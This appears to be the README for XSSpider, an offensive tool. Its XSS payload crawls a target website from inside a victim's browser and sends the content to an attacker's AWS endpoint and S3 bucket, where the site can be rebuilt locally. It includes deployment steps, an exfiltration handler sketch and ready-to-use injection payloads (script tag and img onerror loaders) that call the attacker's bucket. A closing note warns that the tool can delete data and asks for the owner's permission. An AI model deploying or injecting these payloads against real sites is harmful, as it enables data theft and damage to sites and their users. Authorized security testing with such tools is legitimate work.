This tool features a JavaScript-based XSS payload used to crawl and exfiltrate website content. The exfiltrated data is stored in S3 and can be fully recreated and navigated in the attacker's local environment.
Create an AWS account and configure your credentials for the AWS CLI
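For example, credentials can be set up with the AWS CLI's interactive prompt:
aws configure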
npm is required to run the Serverless Framework; it is included with Node.js (https://nodejs.org).
npm install -g serverless
npm update -g serverless
npm install --save serverless-s3-sync
Python 3 is required to run the local server; you can download it from https://www.python.org.
The values for service, s3Bucket_Payload, and s3Bucket_Server will need to be changed to unique names for your environment:
service: {{Your_Service_Name_Here}}
custom:
s3Bucket_Payload: {{S3_Payload_Bucket}}
s3Bucket_Server: {{S3_Server_Bucket}}
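For example, with hypothetical names (note that S3 bucket names must be globally unique):
service: xsspider-demo
custom:
  s3Bucket_Payload: xsspider-demo-payload
  s3Bucket_Server: xsspider-demo-server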
Using the value of s3Bucket_Server you entered in the serverless.yml file, update the value of bucket_name:
import json,boto3,time,base64,hashlib,re
from urllib.parse import unquote
s3 = boto3.client('s3')
bucket_name = '{{S3_Server_Bucket}}'
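The rest of the handler ships with the tool. As a rough sketch only, a storeData-style handler might decode the POSTed page and write it to the bucket; the field names and key scheme below are hypothetical, not XSSpider's actual format:
def storeData(event, context):
    # Hypothetical sketch: decode the POSTed page content and store it in S3.
    body = json.loads(event['body'])
    # Assume the payload URL-encodes and base64-encodes the captured HTML.
    html = base64.b64decode(unquote(body['data']))
    # Keying objects by site and path preserves the site tree for local browsing.
    key = body['site'] + '/' + body['path']
    s3.put_object(Bucket=bucket_name, Key=key, Body=html)
    return {'statusCode': 200, 'body': json.dumps({'stored': key})}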
Using the value of s3Bucket_Payload you entered in the serverless.yml file, update the value of spider_URL:
var spider_URL = 'https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js';
Run the following command in the console; Serverless will package up the resources and deploy them to your AWS environment:
serverless deploy
Output:
Serverless: Stack update finished...
Service Information
service: {{Service_Name}}
stage: dev
region: us-east-1
stack: {{Service_Name}}-dev
resources: 16
api keys:
None
endpoints:
POST - https://{{abcd1234}}.execute-api.us-east-1.amazonaws.com/dev/storeData
functions:
storeData: {{Service_Name}}-dev-storeData
Referencing the output from the previous step, update the storeData_URL variable:
var storeData_URL = 'https://{{abcd1234}}.execute-api.us-east-1.amazonaws.com/dev/storeData';
$(document).ready(function() {
    base_url = window.location.host; // record the target host for later requests
    ProcessHTML($.parseHTML($("html").html(), true)); // parse the current page (keeping scripts) and start crawling
});
Run serverless deploy again to push the updated payload:
serverless deploy
You are now ready to use XSSpider!
Running this code in the browser console on your XSSpider demo site will verify that everything was set up correctly.
$.getScript('https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js')
The payload can be delivered through any injection point on the target site, for example:
<script src="https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js"></script>
<!-- jQuery is defined -->
<img/src=''/onerror="$.getScript('https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js')">
<!-- jQuery is not defined -->
<img src='' onerror="javascript:var script=document.createElement('script');script.src='https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js';document.head.appendChild(script);">
Copy the S3 bucket contents for your target site to the server directory:
cd ./server
aws s3 cp s3://{{S3_Server_Bucket}}/{{Target_Site}} . --recursive
python3 server.py 8888
Navigate to http://localhost:8888 to view the site
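server.py is included with XSSpider; conceptually it is just a static file server over the downloaded copy. A minimal sketch of the idea, assuming the port is passed as the first argument as in the command above:
import sys
from http.server import HTTPServer, SimpleHTTPRequestHandler

# Serve the current directory (the recreated site) on the requested port.
port = int(sys.argv[1]) if len(sys.argv) > 1 else 8888
httpd = HTTPServer(('localhost', port), SimpleHTTPRequestHandler)
print('Serving on http://localhost:%d' % port)
httpd.serve_forever()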
For those who don't want to use AWS and want to skip all the setup, a self-hosted Docker version of XSSpider is currently in development.
XSSpider will enumerate and interact with every link it comes across. If the target site has not been developed properly, this could very well lead to deletion of data or other damaging effects. There is a blacklist of text to avoid, but it does not guarantee anything. Do not use without explicit permission from the target site owner.